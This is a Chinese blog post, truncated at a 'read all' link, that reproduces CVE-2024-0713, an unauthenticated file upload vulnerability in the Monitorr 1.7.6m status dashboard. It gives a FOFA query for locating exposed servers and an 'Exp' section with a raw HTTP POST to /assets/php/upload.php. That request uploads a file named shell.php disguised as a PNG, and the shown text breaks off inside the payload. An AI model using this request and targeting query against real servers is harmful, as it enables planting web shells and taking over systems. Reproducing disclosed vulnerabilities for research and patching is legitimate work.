Monitorr 任意文件上传漏洞复现(CVE-2024-0713)

  • 开发
  • 53

0x01 产品简介

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。

0x02 漏洞概述

Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。

0x03 复现环境

FOFA:body="assets/php/timestamp.php"

0x04 漏洞复现

Exp

POST /assets/php/upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q

------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/png

{
  
  {unquote("\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x01\x00\
阅读全部

相关推荐

  2. CVE-2024-0352:Likeshop任意文件漏洞 [附POC]

    2024-01-26 02:06:02       49 阅读

  10. 漏洞】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767

    2024-01-26 02:06:02       38 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-26 02:06:02       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-26 02:06:02       101 阅读

  9. 在Django里面运行非项目文件

    2024-01-26 02:06:02       82 阅读

  19. Python语言-面向对象

    2024-01-26 02:06:02       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-01-26 02:06:02       85 阅读

热门阅读

  11. WEB字符串包装以及BOM编程

    2024-01-26 02:06:02       48 阅读

  19. 2024-01-25 精神分析-内在自我-单一支持体系-分析

    2024-01-26 02:06:02       53 阅读

  21. Git学习笔记:3 git tag命令

    2024-01-26 02:06:02       71 阅读

  22. python如何使用jieba分词

    2024-01-26 02:06:02       55 阅读

  26. 自定义实现一个线程安全的arrylist,使用设计模式

    2024-01-26 02:06:02       53 阅读

  27. PHP AES加解密系列

    2024-01-26 02:06:02       61 阅读

  28. VR建筑学仿真教学

    2024-01-26 02:06:02       63 阅读

  30. 关于数据库被勒索如何解决?

    2024-01-26 02:06:02       61 阅读